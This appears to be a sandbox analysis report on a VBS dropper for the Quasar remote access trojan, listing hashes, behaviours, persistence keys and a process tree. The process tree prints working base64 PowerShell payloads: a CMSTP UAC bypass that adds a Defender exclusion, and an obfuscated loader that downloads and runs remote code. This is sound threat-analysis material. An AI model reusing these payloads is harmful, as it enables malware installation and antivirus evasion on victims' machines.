quasar | 0dcdaedf2f76dbc431635dbc53c893692cb644f5dbdfde46bc942b9806b8f0d7

Analysis

max time kernel
113s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 03:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0dcdaedf2f76dbc431635dbc53c893692cb644f5dbdfde46bc942b9806b8f0d7.vbs
Size

274KB
MD5

1c83c6f80fcddabd1336cc30aa68d08f
SHA1

bb9c75690963d7c2bb608d5fb3b9b627b1bc4e34
SHA256

0dcdaedf2f76dbc431635dbc53c893692cb644f5dbdfde46bc942b9806b8f0d7
SHA512

832d55005c9192456337f840d409d79c6786fd8d2c97bb33ed04193903564ae3b4d31da0842cc522add532e4fb5b86a231890be90a4e0471b28276f57345d44a
SSDEEP

6144:eUQydS/Z5QL2AEhyNqfrASLddf9USsPgd5QxwNsCQOod2zf:UyduQLnEh4qjASj9USsIP0wNPQ2zf

Score

10^/10

quasar discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/2600-102-0x0000000008390000-0x00000000083EE000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	2600	powershell.exe
26	2600	powershell.exe
28	2600	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2600	powershell.exe
4844	powershell.exe
1872	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_993 = "wscript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate_993.vbs\""	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
432	taskkill.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4844	powershell.exe
4844	powershell.exe
1872	powershell.exe
1872	powershell.exe
2600	powershell.exe
2600	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	432	taskkill.exe
Token: SeDebugPrivilege	2600	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2600	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1668 wrote to memory of 4432	1668	WScript.exe	82
PID 1668 wrote to memory of 4432	1668	WScript.exe	82
PID 4432 wrote to memory of 4136	4432	cmd.exe	84
PID 4432 wrote to memory of 4136	4432	cmd.exe	84
PID 4136 wrote to memory of 4844	4136	cmd.exe	86
PID 4136 wrote to memory of 4844	4136	cmd.exe	86
PID 4844 wrote to memory of 2720	4844	powershell.exe	88
PID 4844 wrote to memory of 2720	4844	powershell.exe	88
PID 2720 wrote to memory of 3020	2720	csc.exe	89
PID 2720 wrote to memory of 3020	2720	csc.exe	89
PID 4844 wrote to memory of 3332	4844	powershell.exe	90
PID 4844 wrote to memory of 3332	4844	powershell.exe	90
PID 4136 wrote to memory of 2600	4136	cmd.exe	99
PID 4136 wrote to memory of 2600	4136	cmd.exe	99
PID 4136 wrote to memory of 2600	4136	cmd.exe	99

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0dcdaedf2f76dbc431635dbc53c893692cb644f5dbdfde46bc942b9806b8f0d7.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4844
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b4vh3fa1\b4vh3fa1.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2720
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8647.tmp" "c:\Users\Admin\AppData\Local\Temp\b4vh3fa1\CSCDD351B443BB4DDA97D2AB97738E4.TMP"
        6⤵
        
        PID:3020
    - - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\mkjxdgnw.inf
        5⤵
        
        PID:3332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gdW5xbXFibGJqbnBiempnKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnakZzSUxYMnhsKzBOYVJ0eGVzZ3Z2NURCdmpybmM5TmVIdVlHWFdzL09oQT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3E5aElSZmtwSTU4NHJqSi9CdGpwK3c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaGl6bGF6ZmNwb2Rramx2KCRwYXJhbV92YXIpewlJRVggJyRkaWJzdmh1d2xwYW93Y3J2dmVueWZwdXJkPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHBsYXhucWJwbmpnemdvem1sb3dhbGl6eXQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRoZ3ducW5va3Bmd3V6eHl5emp0a3ZwcW9tPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGRpYnN2aHV3bHBhb3djcnZ2ZW55ZnB1cmQsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGhnd25xbm9rcGZ3dXp4eXl6anRrdnBxb20uQ29weVRvKCRwbGF4bnFicG5qZ3pnb3ptbG93YWxpenl0KTsJJGhnd25xbm9rcGZ3dXp4eXl6anRrdnBxb20uRGlzcG9zZSgpOwkkZGlic3ZodXdscGFvd2NydnZlbnlmcHVyZC5EaXNwb3NlKCk7CSRwbGF4bnFicG5qZ3pnb3ptbG93YWxpenl0LkRpc3Bvc2UoKTsJJHBsYXhucWJwbmpnemdvem1sb3dhbGl6eXQuVG9BcnJheSgpO31mdW5jdGlvbiB0cHV3cHVramJxbHBncGd3dW50Zm5wZ3NkKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckdGJ5cXJnbGJlZmtmYnh2c29xaWRybXF5Ym16Zm94c3FpYnhtcHR4ej1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGt0dXNvdHhseXJneWhrdWdrYW9maGZuZ251d2FhaWN2c2lzeXN5amlvbmh3cXRpeGdxPSR0YnlxcmdsYmVma2ZieHZzb3FpZHJtcXlibXpmb3hzcWlieG1wdHh6LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGt0dXNvdHhseXJneWhrdWdrYW9maGZuZ251d2FhaWN2c2lzeXN5amlvbmh3cXRpeGdxLkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kamJqY2xwaXZqamh0YW5xY3lybnV0Y3RzeiA9ICRlbnY6VVNFUk5BTUU7JGlpdHJvZWdndXpoeHN5cHJyd29wdHNkZ3cgPSAnQzpcVXNlcnNcJyArICRqYmpjbHBpdmpqaHRhbnFjeXJudXRjdHN6ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaWl0cm9lZ2d1emh4c3lwcnJ3b3B0c2RndzskdXVwZmc9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRpaXRyb2VnZ3V6aHhzeXBycndvcHRzZGd3KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgka3FhIGluICR1dXBmZykgewlpZiAoJGtxYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkcWZtdXQ9JGtxYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZHVrdmJwenFzbXhrb2plbmx5b29reXlwdz1bc3RyaW5nW11dJHFmbXV0LlNwbGl0KCdcJyk7SUVYICckYXhocHBhaXl3bXNwbnV4ZnJpZXNnZm15bz1oaXpsYXpmY3BvZGtqbHYgKHVucW1xYmxiam5wYnpqZyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRkdWt2YnB6cXNteGtvamVubHlvb2t5eXB3WzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHpvc3NnZnZ2emFzcmJjbXBsc3dseHlkcmo9aGl6bGF6ZmNwb2Rramx2ICh1bnFtcWJsYmpucGJ6amcgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZHVrdmJwenFzbXhrb2plbmx5b29reXlwd1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt0cHV3cHVramJxbHBncGd3dW50Zm5wZ3NkICRheGhwcGFpeX